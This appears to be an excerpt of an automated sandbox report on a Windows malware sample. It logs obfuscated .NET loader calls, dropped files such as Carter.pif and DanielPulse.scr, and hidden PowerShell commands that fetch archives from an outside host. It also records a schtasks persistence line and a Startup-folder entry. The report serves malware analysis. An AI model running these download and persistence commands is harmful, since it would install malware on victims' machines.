               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
               Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
               Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
               Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
               Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_004062FC
               Source: C:\Windows\SysWOW64\mshta.exe | Code function: 0_2_05AECB26 push eax; retf 0_2_05AECB2D
               Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_00298B75 push ecx; ret 29_2_00298B88
               Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0028CBDB push eax; retf 29_2_0028CBF8
               Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0028CC06 push eax; retf 29_2_0028CBF8
               Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00908B75 push ecx; ret 37_2_00908B88
               Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_05702372 pushfd ; iretd 41_2_05702379
               Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_05702332 pushad ; iretd 41_2_05702319
               Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_057022F0 push esp; iretd 41_2_057022F1
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, OfpCuG0X22QLMT.cs | High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs | High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, GKj04XVvJiEzT5.cs | High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs | High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, JbeTyT6ozehDZJ.cs | High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
               Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, OfpCuG0X22QLMT.cs | High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs | High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.cs | High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs | High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.cs | High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
               Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, OfpCuG0X22QLMT.cs | High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs | High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.cs | High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs | High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.cs | High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
               Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif File created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif File created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

              Boot Survival

              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 29_2_002F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 29_2_002F59B3
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 29_2_00285EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 29_2_00285EDA
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 37_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 37_2_009659B3
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 37_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 37_2_008F5EDA
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 29_2_002933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 29_2_002933B7
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
